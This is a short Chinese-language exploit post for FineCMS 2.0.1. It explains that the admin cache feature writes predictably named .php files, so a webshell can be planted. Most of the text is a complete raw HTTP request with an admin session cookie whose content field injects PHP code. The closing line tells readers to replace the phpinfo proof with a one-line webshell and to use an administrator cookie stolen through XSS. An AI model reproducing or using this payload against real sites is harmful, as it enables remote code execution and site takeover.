FineCMS有一个缓存功能,和当初Wordpress一样,有一个缓存功能,并且缓存的文件名不是随机的并且后缀是php,就导致了可以利用后台缓存功能来getshell。

下面是Payload

POST /index.php?s=admin&c=category&a=edit&catid=13 HTTP/1.1
Host: finecms2.0.1
Content-Length: 813
Cache-Control: max-age=0
Origin: http://finecms2.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://finecms2.0.1/index.php?s=admin&c=category&a=edit&catid=13
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: finecms_b1bf4_member_id=1; finecms_b1bf4_member_code=5bd1ebd88ad1c863ecc2; cod=10; csd=13; finecms_b1bf4_ci_session=a%3A7%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221f2b4dc45dd971bb0cd46febe32f5967%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_5%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F51.0.2704.106+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1468985849%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22error_admin_login%22%3Bi%3A5%3Bs%3A7%3A%22user_id%22%3Bs%3A1%3A%221%22%3B%7D0edaafa3cae30c09ebb401c1ff2d76dd80c0ec91
Connection: close

catid=13&typeid=2&data%5Bparentid%5D=10&data%5Bcatname%5D=123&data%5Bcatdir%5D=123&setting%5Bdocument%5D=&data%5Bimage%5D=&data%5Bismenu%5D=1&data%5Burlpath%5D=&abc=10&data%5Bpagesize%5D=20&data%5Bcategorytpl%5D=&data%5Blisttpl%5D=&data%5Bshowtpl%5D=page.html&data%5Bmeta_title%5D=&data%5Bmeta_keywords%5D=&data%5Bmeta_description%5D=&setting%5Bverifypost%5D=0&setting%5Badminpost%5D=0&setting%5Bmemberpost%5D=0&setting%5Bguestpost%5D=0&setting%5Bguestpost%5D=&setting%5Burl%5D%5Buse%5D=0&setting%5Burl%5D%5Btohtml%5D=0&setting%5Burl%5D%5Bhtmldir%5D=html&setting%5Burl%5D%5Blist%5D=&setting%5Burl%5D%5Blist_page%5D=&setting%5Burl%5D%5Bshow%5D=&setting%5Burl%5D%5Bshow_page%5D=&setting%5Burl%5D%5Bcatjoin%5D=%2F&submit=%E6%8F%90%E4%BA%A4&data%5Bcontent%5D=%3Cp%3E%0D%0A%09"}//%0D
<?php phpinfo();?>
%0D//{"%3C%2Fp%3E

把phpinfo();换成一句话,cookie换成XSS打到的管理员的就好。